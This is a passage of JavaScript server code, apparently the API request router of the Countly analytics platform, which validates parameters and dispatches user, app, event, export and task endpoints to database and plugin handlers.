params.req.body) { params.qstring[i] = params.req.body[i]; } } if (params.qstring.app_id && params.qstring.app_id.length !== 24) { common.returnMessage(params, 400, 'Invalid parameter "app_id"'); return false; } if (params.qstring.user_id && params.qstring.user_id.length !== 24) { common.returnMessage(params, 400, 'Invalid parameter "user_id"'); return false; } //remove countly path if (common.config.path === "/" + paths[1]) { paths.splice(1, 1); } let apiPath = ''; for (let i = 1; i < paths.length; i++) { if (i > 2) { break; } apiPath += "/" + paths[i]; } params.apiPath = apiPath; params.fullPath = paths.join("/"); reloadConfig().then(function() { plugins.dispatch("/", { params: params, apiPath: apiPath, validateAppForWriteAPI: validateAppForWriteAPI, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin, paths: paths, urlParts: urlParts }); if (!params.cancelRequest) { switch (apiPath) { case '/i/bulk': { let requests = params.qstring.requests; if (requests && typeof requests === "string") { try { requests = JSON.parse(requests); } catch (SyntaxError) { console.log('Parse bulk JSON failed', requests, params.req.url, params.req.body); requests = null; } } if (!requests) { common.returnMessage(params, 400, 'Missing parameter "requests"'); return false; } if (!Array.isArray(requests)) { console.log("Passed invalid param for request. Expected Array, got " + typeof requests); common.returnMessage(params, 400, 'Invalid parameter "requests"'); return false; } if (!plugins.getConfig("api", params.app && params.app.plugins, true).safe && !params.res.finished) { common.returnMessage(params, 200, 'Success'); } common.blockResponses(params); processBulkRequest(0, requests, params); break; } case '/i/users': { if (params.qstring.args) { try { params.qstring.args = JSON.parse(params.qstring.args); } catch (SyntaxError) { console.log('Parse ' + apiPath + ' JSON failed', params.req.url, params.req.body); } } switch (paths[3]) { case 'create': validateCreate(params, 'global_users', countlyApi.mgmt.users.createUser); break; case 'update': validateUpdate(params, 'global_users', countlyApi.mgmt.users.updateUser); break; case 'delete': validateDelete(params, 'global_users', countlyApi.mgmt.users.deleteUser); break; case 'deleteOwnAccount': validateDelete(params, 'global_users', countlyApi.mgmt.users.deleteOwnAccount); break; case 'ack': validateUserForWriteAPI(countlyApi.mgmt.users.ackNotification, params); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /create, /update, /deleteOwnAccount or /delete'); } break; } break; } case '/i/notes': { if (params.qstring.args) { try { params.qstring.args = JSON.parse(params.qstring.args); } catch (SyntaxError) { console.log('Parse ' + apiPath + ' JSON failed', params.req.url, params.req.body); } } switch (paths[3]) { case 'save': validateCreate(params, 'core', () => { countlyApi.mgmt.users.saveNote(params); }); break; case 'delete': validateDelete(params, 'core', () => { countlyApi.mgmt.users.deleteNote(params); }); break; } break; } case '/i/app_users': { switch (paths[3]) { case 'create': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } if (!params.qstring.data) { common.returnMessage(params, 400, 'Missing parameter "data"'); return false; } else if (typeof params.qstring.data === "string") { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { console.log("Could not parse data", params.qstring.data); common.returnMessage(params, 400, 'Could not parse parameter "data": ' + params.qstring.data); return false; } } if (!Object.keys(params.qstring.data).length) { common.returnMessage(params, 400, 'Parameter "data" cannot be empty'); return false; } validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.create(params.qstring.app_id, params.qstring.data, params, function(err, res) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, 'User Created: ' + JSON.stringify(res)); } }); }); break; } case 'update': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } if (!params.qstring.update) { common.returnMessage(params, 400, 'Missing parameter "update"'); return false; } else if (typeof params.qstring.update === "string") { try { params.qstring.update = JSON.parse(params.qstring.update); } catch (ex) { console.log("Could not parse update", params.qstring.update); common.returnMessage(params, 400, 'Could not parse parameter "update": ' + params.qstring.update); return false; } } if (!Object.keys(params.qstring.update).length) { common.returnMessage(params, 400, 'Parameter "update" cannot be empty'); return false; } if (!params.qstring.query) { common.returnMessage(params, 400, 'Missing parameter "query"'); return false; } else if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { console.log("Could not parse query", params.qstring.query); common.returnMessage(params, 400, 'Could not parse parameter "query": ' + params.qstring.query); return false; } } validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.count(params.qstring.app_id, params.qstring.query, function(err, count) { if (err || count === 0) { common.returnMessage(params, 400, 'No users matching criteria'); return false; } if (count > 1 && !params.qstring.force) { common.returnMessage(params, 400, 'This query would update more than one user'); return false; } countlyApi.mgmt.appUsers.update(params.qstring.app_id, params.qstring.query, params.qstring.update, params, function(err2) { if (err2) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, 'User Updated'); } }); }); }); break; } case 'delete': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } if (!params.qstring.query) { common.returnMessage(params, 400, 'Missing parameter "query"'); return false; } else if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { console.log("Could not parse query", params.qstring.query); common.returnMessage(params, 400, 'Could not parse parameter "query": ' + params.qstring.query); return false; } } if (!Object.keys(params.qstring.query).length) { common.returnMessage(params, 400, 'Parameter "query" cannot be empty, it would delete all users. Use clear app instead'); return false; } validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.count(params.qstring.app_id, params.qstring.query, function(err, count) { if (err || count === 0) { common.returnMessage(params, 400, 'No users matching criteria'); return false; } if (count > 1 && !params.qstring.force) { common.returnMessage(params, 400, 'This query would delete more than one user'); return false; } countlyApi.mgmt.appUsers.delete(params.qstring.app_id, params.qstring.query, params, function(err2) { if (err2) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, 'User deleted'); } }); }); }); break; } case 'deleteExport': { validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.deleteExport(paths[4], params, function(err) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, 'Export deleted'); } }); }); break; } case 'export': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } validateUserForWrite(params, function() { taskmanager.checkIfRunning({ db: common.db, params: params //allow generate request from params, as it is what identifies task in drill }, function(task_id) { //check if task already running if (task_id) { common.returnOutput(params, {task_id: task_id}); } else { if (!params.qstring.query) { common.returnMessage(params, 400, 'Missing parameter "query"'); return false; } else if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { console.log("Could not parse query", params.qstring.query); common.returnMessage(params, 400, 'Could not parse parameter "query": ' + params.qstring.query); return false; } } var my_name = ""; if (params.qstring.query) { my_name = JSON.stringify(params.qstring.query); } countlyApi.mgmt.appUsers.export(params.qstring.app_id, params.qstring.query || {}, params, taskmanager.longtask({ db: common.db, threshold: plugins.getConfig("api").request_threshold, force: false, app_id: params.qstring.app_id, params: params, type: "AppUserExport", report_name: "User export", meta: JSON.stringify({ "app_id": params.qstring.app_id, "query": params.qstring.query || {} }), name: my_name, view: "#/exportedData/AppUserExport/", processData: function(err, res, callback) { if (!err) { callback(null, res); } else { callback(err, ''); } }, outputData: function(err, data) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, data); } } })); } }); }); break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/i/apps': { if (params.qstring.args) { try { params.qstring.args = JSON.parse(params.qstring.args); } catch (SyntaxError) { console.log('Parse ' + apiPath + ' JSON failed', params.req.url, params.req.body); } } switch (paths[3]) { case 'create': validateCreate(params, 'global_applications', countlyApi.mgmt.apps.createApp); break; case 'update': if (paths[4] === 'plugins') { validateUpdate(params, 'global_applications', countlyApi.mgmt.apps.updateAppPlugins); } else { validateUpdate(params, 'global_applications', countlyApi.mgmt.apps.updateApp); } break; case 'delete': validateDelete(params, 'global_applications', countlyApi.mgmt.apps.deleteApp); break; case 'reset': validateDelete(params, 'global_applications', countlyApi.mgmt.apps.resetApp); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /create, /update, /delete or /reset'); } break; } break; } case '/i/event_groups': switch (paths[3]) { case 'create': validateCreate(params, 'core', countlyApi.mgmt.eventGroups.create); break; case 'update': validateUpdate(params, 'core', countlyApi.mgmt.eventGroups.update); break; case 'delete': validateDelete(params, 'core', countlyApi.mgmt.eventGroups.remove); break; default: break; } break; case '/i/tasks': { if (!params.qstring.task_id) { common.returnMessage(params, 400, 'Missing parameter "task_id"'); return false; } switch (paths[3]) { case 'update': validateUserForWrite(params, () => { taskmanager.rerunTask({ db: common.db, id: params.qstring.task_id }, (err, res) => { common.returnMessage(params, 200, res); }); }); break; case 'delete': validateUserForWrite(params, () => { taskmanager.deleteResult({ db: common.db, id: params.qstring.task_id }, () => { common.returnMessage(params, 200, "Success"); }); }); break; case 'name': validateUserForWrite(params, () => { taskmanager.nameResult({ db: common.db, id: params.qstring.task_id, name: params.qstring.name }, () => { common.returnMessage(params, 200, "Success"); }); }); break; case 'edit': validateUserForWrite(params, () => { const data = { "report_name": params.qstring.report_name, "report_desc": params.qstring.report_desc, "global": params.qstring.global + "" === 'true', "autoRefresh": params.qstring.autoRefresh + "" === 'true', "period_desc": params.qstring.period_desc }; taskmanager.editTask({ db: common.db, data: data, id: params.qstring.task_id }, (err) => { if (err) { common.returnMessage(params, 503, "Error"); } else { common.returnMessage(params, 200, "Success"); } }); }); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/i/events': { switch (paths[3]) { case 'whitelist_segments': { validateUpdate(params, "events", function() { common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); return; } else if (!event) { common.returnMessage(params, 400, "Could not find record in event collection"); return; } //rewrite whitelisted if (params.qstring.whitelisted_segments && params.qstring.whitelisted_segments !== "") { try { params.qstring.whitelisted_segments = JSON.parse(params.qstring.whitelisted_segments); } catch (SyntaxError) { params.qstring.whitelisted_segments = {}; console.log('Parse ' + params.qstring.whitelisted_segments + ' JSON failed', params.req.url, params.req.body); } var update = {}; var whObj = params.qstring.whitelisted_segments; for (let k in whObj) { if (Array.isArray(whObj[k]) && whObj[k].length > 0) { update.$set = update.$set || {}; update.$set["whitelisted_segments." + k] = whObj[k]; } else { update.$unset = update.$unset || {}; update.$unset["whitelisted_segments." + k] = true; } } common.db.collection('events').update({"_id": common.db.ObjectID(params.qstring.app_id)}, update, function(err2) { if (err2) { common.returnMessage(params, 400, err2); } else { var data_arr = {update: {}}; if (update.$set) { data_arr.update.$set = update.$set; } if (update.$unset) { data_arr.update.$unset = update.$unset; } data_arr.update = JSON.stringify(data_arr.update); common.returnMessage(params, 200, 'Success'); plugins.dispatch("/systemlogs", { params: params, action: "segments_whitelisted_for_events", data: data_arr }); } }); } else { common.returnMessage(params, 400, "Value for 'whitelisted_segments' missing"); return; } }); }); break; } case 'edit_map': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } validateUpdate(params, 'events', function() { common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); return; } else if (!event) { common.returnMessage(params, 400, "Could not find event"); return; } var update_array = {}; var update_segments = []; var pull_us = {}; if (params.qstring.event_order && params.qstring.event_order !== "") { try { update_array.order = JSON.parse(params.qstring.event_order); } catch (SyntaxError) { update_array.order = event.order; console.log('Parse ' + params.qstring.event_order + ' JSON failed', params.req.url, params.req.body); } } else { update_array.order = event.order || []; } if (params.qstring.event_overview && params.qstring.event_overview !== "") { try { update_array.overview = JSON.parse(params.qstring.event_overview); } catch (SyntaxError) { update_array.overview = []; console.log('Parse ' + params.qstring.event_overview + ' JSON failed', params.req.url, params.req.body); } if (update_array.overview && Array.isArray(update_array.overview) && update_array.overview.length > 12) { common.returnMessage(params, 400, "You can't add more than 12 items in overview"); return; } //check for duplicates var overview_map = {}; for (let p = 0; p < update_array.overview.length; p++) { if (!overview_map[update_array.overview[p].eventKey]) { overview_map[update_array.overview[p].eventKey] = {}; } if (!overview_map[update_array.overview[p].eventKey][update_array.overview[p].eventProperty]) { overview_map[update_array.overview[p].eventKey][update_array.overview[p].eventProperty] = 1; } else { update_array.overview.splice(p, 1); p = p - 1; } } } else { update_array.overview = event.overview || []; } update_array.omitted_segments = {}; if (event.omitted_segments) { try { update_array.omitted_segments = JSON.parse(JSON.stringify(event.omitted_segments)); } catch (SyntaxError) { update_array.omitted_segments = {}; } } if (params.qstring.omitted_segments && params.qstring.omitted_segments !== "") { try { params.qstring.omitted_segments = JSON.parse(params.qstring.omitted_segments); } catch (SyntaxError) { params.qstring.omitted_segments = {}; console.log('Parse ' + params.qstring.omitted_segments + ' JSON failed', params.req.url, params.req.body); } for (let k in params.qstring.omitted_segments) { update_array.omitted_segments[k] = params.qstring.omitted_segments[k]; update_segments.push({ "key": k, "list": params.qstring.omitted_segments[k] }); pull_us["segments." + k] = {$in: params.qstring.omitted_segments[k]}; } } if (params.qstring.event_map && params.qstring.event_map !== "") { try { params.qstring.event_map = JSON.parse(params.qstring.event_map); } catch (SyntaxError) { params.qstring.event_map = {}; console.log('Parse ' + params.qstring.event_map + ' JSON failed', params.req.url, params.req.body); } if (event.map) { try { update_array.map = JSON.parse(JSON.stringify(event.map)); } catch (SyntaxError) { update_array.map = {}; } } else { update_array.map = {}; } for (let k in params.qstring.event_map) { if (Object.prototype.hasOwnProperty.call(params.qstring.event_map, k)) { update_array.map[k] = params.qstring.event_map[k]; if (update_array.map[k].is_visible && update_array.map[k].is_visible === true) { delete update_array.map[k].is_visible; } if (update_array.map[k].name && update_array.map[k].name === k) { delete update_array.map[k].name; } if (update_array.map[k] && typeof update_array.map[k].is_visible !== 'undefined' && update_array.map[k].is_visible === false) { for (var j = 0; j < update_array.overview.length; j++) { if (update_array.overview[j].eventKey === k) { update_array.overview.splice(j, 1); j = j - 1; } } } if (Object.keys(update_array.map[k]).length === 0) { delete update_array.map[k]; } } } } var changes = {$set: update_array}; if (Object.keys(pull_us).length > 0) { changes = { $set: update_array, $pull: pull_us }; } common.db.collection('events').update({"_id": common.db.ObjectID(params.qstring.app_id)}, changes, function(err2) { if (err2) { common.returnMessage(params, 400, err2); } else { var data_arr = {update: update_array}; data_arr.before = { order: [], map: {}, overview: [], omitted_segments: {} }; if (event.order) { data_arr.before.order = event.order; } if (event.map) { data_arr.before.map = event.map; } if (event.overview) { data_arr.before.overview = event.overview; } if (event.omitted_segments) { data_arr.before.omitted_segments = event.omitted_segments; } //updated, clear out segments Promise.all(update_segments.map(function(obj) { return new Promise(function(resolve) { var collectionNameWoPrefix = common.crypto.createHash('sha1').update(obj.key + params.qstring.app_id).digest('hex'); //removes all document for current segment common.db.collection("events" + collectionNameWoPrefix).remove({"s": {$in: obj.list}}, {multi: true}, function(err3) { if (err3) { console.log(err3); } //create query for all segments var my_query = []; var unsetUs = {}; if (obj.list.length > 0) { for (let p = 0; p < obj.list.length; p++) { my_query[p] = {}; my_query[p]["meta_v2.segments." + obj.list[p]] = {$exists: true}; //for select unsetUs["meta_v2.segments." + obj.list[p]] = ""; //remove from list unsetUs["meta_v2." + obj.list[p]] = ""; } //clears out meta data for segments common.db.collection("events" + collectionNameWoPrefix).update({$or: my_query}, {$unset: unsetUs}, {multi: true}, function(err4) { if (err4) { console.log(err4); } if (plugins.isPluginEnabled('drill')) { //remove from drill var eventHash = common.crypto.createHash('sha1').update(obj.key + params.qstring.app_id).digest('hex'); common.drillDb.collection("drill_meta" + params.qstring.app_id).findOne({_id: "meta_" + eventHash}, function(err5, resEvent) { if (err5) { console.log(err5); } var newsg = {}; var remove_biglists = []; resEvent = resEvent || {}; resEvent.sg = resEvent.sg || {}; for (let p = 0; p < obj.list.length; p++) { if (resEvent.sg[obj.list[p]] && resEvent.sg[obj.list[p]].type === "bl") { remove_biglists.push("meta_" + eventHash + "_sg." + obj.list[p]); } newsg["sg." + obj.list[p]] = {"type": "s"}; } //big list, delete also big list file if (remove_biglists.length > 0) { common.drillDb.collection("drill_meta" + params.qstring.app_id).remove({_id: {$in: remove_biglists}}, function(err6) { if (err6) { console.log(err6); } common.drillDb.collection("drill_meta" + params.qstring.app_id).update({_id: "meta_" + eventHash}, {$set: newsg}, function(err7) { if (err7) { console.log(err7); } resolve(); }); }); } else { common.drillDb.collection("drill_meta" + params.qstring.app_id).update({_id: "meta_" + eventHash}, {$set: newsg}, function() { resolve(); }); } }); } else { resolve(); } }); } else { resolve(); } }); }); })).then(function() { common.returnMessage(params, 200, 'Success'); plugins.dispatch("/systemlogs", { params: params, action: "events_updated", data: data_arr }); }) .catch((error) => { console.log(error); common.returnMessage(params, 400, 'Events were updated sucessfully. There was error during clearing segment data. Please look in log for more onformation'); }); } }); }); }); break; } case 'delete_events': { validateDelete(params, 'events', function() { var idss = []; try { idss = JSON.parse(params.qstring.events); } catch (SyntaxError) { idss = []; } if (!Array.isArray(idss)) { idss = []; } var app_id = params.qstring.app_id; var updateThese = {"$unset": {}}; if (idss.length > 0) { for (let i = 0; i < idss.length; i++) { if (idss[i].indexOf('.') !== -1) { updateThese.$unset["map." + idss[i].replace(/\./g, '\\u002e')] = 1; updateThese.$unset["omitted_segments." + idss[i].replace(/\./g, '\\u002e')] = 1; } else { updateThese.$unset["map." + idss[i]] = 1; updateThese.$unset["omitted_segments." + idss[i]] = 1; } idss[i] = common.decode_html(idss[i]);//previously escaped, get unescaped id (because segments are using it) if (idss[i].indexOf('.') !== -1) { updateThese.$unset["segments." + idss[i].replace(/\./g, '\\u002e')] = 1; } else { updateThese.$unset["segments." + idss[i]] = 1; } } common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); } if (!event) { common.returnMessage(params, 400, "Could not find event"); return; } //fix overview if (event.overview && event.overview.length) { for (let i = 0; i < idss.length; i++) { for (let j = 0; j < event.overview.length; j++) { if (event.overview[j].eventKey === idss[i]) { event.overview.splice(j, 1); j = j - 1; } } } if (!updateThese.$set) { updateThese.$set = {}; } updateThese.$set.overview = event.overview; } //remove from list if (typeof event.list !== 'undefined' && Array.isArray(event.list) && event.list.length > 0) { for (let i = 0; i < idss.length; i++) { let index = event.list.indexOf(idss[i]); if (index > -1) { event.list.splice(index, 1); i = i - 1; } } if (!updateThese.$set) { updateThese.$set = {}; } updateThese.$set.list = event.list; } //remove from order if (typeof event.order !== 'undefined' && Array.isArray(event.order) && event.order.length > 0) { for (let i = 0; i < idss.length; i++) { let index = event.order.indexOf(idss[i]); if (index > -1) { event.order.splice(index, 1); i = i - 1; } } if (!updateThese.$set) { updateThese.$set = {}; } updateThese.$set.order = event.order; } common.db.collection('events').update({"_id": common.db.ObjectID(app_id)}, updateThese, function(err2) { if (err2) { console.log(err2); common.returnMessage(params, 400, err); } else { for (let i = 0; i < idss.length; i++) { var collectionNameWoPrefix = common.crypto.createHash('sha1').update(idss[i] + app_id).digest('hex'); common.db.collection("events" + collectionNameWoPrefix).drop(function() {}); plugins.dispatch("/i/event/delete", { event_key: idss[i], appId: app_id }); } plugins.dispatch("/systemlogs", { params: params, action: "event_deleted", data: { events: idss, appID: app_id } }); common.returnMessage(params, 200, 'Success'); } }); }); } else { common.returnMessage(params, 400, "Missing events to delete"); } }); break; } case 'change_visibility': { validateUpdate(params, 'events', function() { common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); return; } if (!event) { common.returnMessage(params, 400, "Could not find event"); return; } var update_array = {}; var idss = []; try { idss = JSON.parse(params.qstring.events); } catch (SyntaxError) { idss = []; } if (!Array.isArray(idss)) { idss = []; } if (event.map) { try { update_array.map = JSON.parse(JSON.stringify(event.map)); } catch (SyntaxError) { update_array.map = {}; console.log('Parse ' + event.map + ' JSON failed', params.req.url, params.req.body); } } else { update_array.map = {}; } for (let i = 0; i < idss.length; i++) { var baseID = idss[i].replace(/\\u002e/g, "."); if (!update_array.map[idss[i]]) { update_array.map[idss[i]] = {}; } if (params.qstring.set_visibility === 'hide') { update_array.map[idss[i]].is_visible = false; } else { update_array.map[idss[i]].is_visible = true; } if (update_array.map[idss[i]].is_visible) { delete update_array.map[idss[i]].is_visible; } if (Object.keys(update_array.map[idss[i]]).length === 0) { delete update_array.map[idss[i]]; } if (params.qstring.set_visibility === 'hide' && event && event.overview && Array.isArray(event.overview)) { for (let j = 0; j < event.overview.length; j++) { if (event.overview[j].eventKey === baseID) { event.overview.splice(j, 1); j = j - 1; } } update_array.overview = event.overview; } } common.db.collection('events').update({"_id": common.db.ObjectID(params.qstring.app_id)}, {'$set': update_array}, function(err2) { if (err2) { common.returnMessage(params, 400, err2); } else { common.returnMessage(params, 200, 'Success'); var data_arr = {update: update_array}; data_arr.before = {map: {}}; if (event.map) { data_arr.before.map = event.map; } plugins.dispatch("/systemlogs", { params: params, action: "events_updated", data: data_arr }); } }); }); }); break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/i': { params.ip_address = params.qstring.ip_address || common.getIpAddress(params.req); params.user = {}; if (!params.qstring.app_key || !params.qstring.device_id) { common.returnMessage(params, 400, 'Missing parameter "app_key" or "device_id"'); return false; } else { //make sure device_id is string params.qstring.device_id += ""; params.qstring.app_key += ""; // Set app_user_id that is unique for each user of an application. params.app_user_id = common.crypto.createHash('sha1') .update(params.qstring.app_key + params.qstring.device_id + "") .digest('hex'); } if (params.qstring.events && typeof params.qstring.events === "string") { try { params.qstring.events = JSON.parse(params.qstring.events); } catch (SyntaxError) { console.log('Parse events JSON failed', params.qstring.events, params.req.url, params.req.body); } } log.d('processing request %j', params.qstring); params.promises = []; validateAppForWriteAPI(params, () => { /** * Dispatches /sdk/end event upon finishing processing request **/ function resolver() { plugins.dispatch("/sdk/end", {params: params}); } Promise.all(params.promises) .then(resolver) .catch((error) => { console.log(error); resolver(); }); }); break; } case '/o/users': { switch (paths[3]) { case 'all': validateRead(params, 'global_users', countlyApi.mgmt.users.getAllUsers); break; case 'me': validateUserForMgmtReadAPI(countlyApi.mgmt.users.getCurrentUser, params); break; case 'id': validateRead(params, 'global_users', countlyApi.mgmt.users.getUserById); break; case 'reset_timeban': validateUpdate(params, 'global_users', countlyApi.mgmt.users.resetTimeBan); break; case 'permissions': validateRead(params, 'core', function() { var features = ["core", "events", "global_configurations", "global_applications", "global_users", "global_jobs"]; plugins.dispatch("/permissions/features", {params: params, features: features}, function() { common.returnOutput(params, features); }); }); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/o/app_users': { switch (paths[3]) { case 'loyalty': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } validateUserForMgmtReadAPI(countlyApi.mgmt.appUsers.loyalty, params); break; } case 'download': { if (paths[4] && paths[4] !== '') { validateUserForRead(params, function() { var filename = paths[4].split('.'); var myfile = '../../export/AppUser/' + filename[0] + '.tar.gz'; countlyFs.gridfs.getSize("appUsers", myfile, {id: filename[0] + '.tar.gz'}, function(error, size) { if (error) { common.returnMessage(params, 400, error); } else if (parseInt(size) === 0) { common.returnMessage(params, 400, "Export doesn't exist"); } else { countlyFs.gridfs.getStream("appUsers", myfile, {id: filename[0] + '.tar.gz'}, function(err, stream) { if (err) { common.returnMessage(params, 400, "Export doesn't exist"); } else { params.res.writeHead(200, { 'Content-Type': 'application/x-gzip', 'Content-Length': size, 'Content-Disposition': 'inline; filename="' + filename[0] + '.tar.gz"' }); stream.pipe(params.res); } }); } }); }); } else { common.returnMessage(params, 400, 'Missing filename'); } break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/o/apps': { switch (paths[3]) { case 'all': validateRead(params, 'global_applications', countlyApi.mgmt.apps.getAllApps); break; case 'mine': validateUser(params, countlyApi.mgmt.apps.getCurrentUserApps); break; case 'details': validateRead(params, 'global_applications', countlyApi.mgmt.apps.getAppsDetails); break; case 'plugins': validateRead(params, 'global_applications', countlyApi.mgmt.apps.getAppPlugins); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all, /mine, /details or /plugins'); } break; } break; } case '/o/tasks': { switch (paths[3]) { case 'all': validateRead(params, 'core', () => { if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { params.qstring.query = {}; } } if (params.qstring.query.$or) { params.qstring.query.$and = [ {"$or": Object.assign([], params.qstring.query.$or) }, {"$or": [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]} ]; delete params.qstring.query.$or; } else { params.qstring.query.$or = [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]; } params.qstring.query.subtask = {$exists: false}; params.qstring.query.app_id = params.qstring.app_id; if (params.qstring.app_ids && params.qstring.app_ids !== "") { var ll = params.qstring.app_ids.split(","); if (ll.length > 1) { params.qstring.query.app_id = {$in: ll}; } } if (params.qstring.period) { countlyCommon.getPeriodObj(params); params.qstring.query.ts = countlyCommon.getTimestampRangeQuery(params, false); } taskmanager.getResults({ db: common.db, query: params.qstring.query }, (err, res) => { common.returnOutput(params, res || []); }); }); break; case 'count': validateRead(params, 'core', () => { if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { params.qstring.query = {}; } } if (params.qstring.query.$or) { params.qstring.query.$and = [ {"$or": Object.assign([], params.qstring.query.$or) }, {"$or": [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]} ]; delete params.qstring.query.$or; } else { params.qstring.query.$or = [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]; } if (params.qstring.period) { countlyCommon.getPeriodObj(params); params.qstring.query.ts = countlyCommon.getTimestampRangeQuery(params, false); } taskmanager.getCounts({ db: common.db, query: params.qstring.query }, (err, res) => { common.returnOutput(params, res || []); }); }); break; case 'list': validateRead(params, 'core', () => { if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { params.qstring.query = {}; } } if (params.qstring.query.$or) { params.qstring.query.$and = [ {"$or": Object.assign([], params.qstring.query.$or) }, {"$or": [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]} ]; delete params.qstring.query.$or; } else { params.qstring.query.$or = [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]; } params.qstring.query.subtask = {$exists: false}; params.qstring.query.app_id = params.qstring.app_id; if (params.qstring.period) { countlyCommon.getPeriodObj(params); params.qstring.query.ts = countlyCommon.getTimestampRangeQuery(params, false); } const skip = params.qstring.iDisplayStart; const limit = params.qstring.iDisplayLength; const sEcho = params.qstring.sEcho; const keyword = params.qstring.sSearch || null; const sortBy = params.qstring.iSortCol_0 || null; const sortSeq = params.qstring.sSortDir_0 || null; taskmanager.getTableQueryResult({ db: common.db, query: params.qstring.query, page: {skip, limit}, sort: {sortBy, sortSeq}, keyword: keyword, }, (err, res) => { if (!err) { common.returnOutput(params, {aaData: res.list, iTotalDisplayRecords: res.count, iTotalRecords: res.count, sEcho}); } else { common.returnMessage(params, 500, '"Query failed"'); } }); }); break; case 'task': validateRead(params, 'core', () => { if (!params.qstring.task_id) { common.returnMessage(params, 400, 'Missing parameter "task_id"'); return false; } taskmanager.getResult({ db: common.db, id: params.qstring.task_id, subtask_key: params.qstring.subtask_key }, (err, res) => { if (res) { common.returnOutput(params, res); } else { common.returnMessage(params, 400, 'Task does not exist'); } }); }); break; case 'check': validateRead(params, 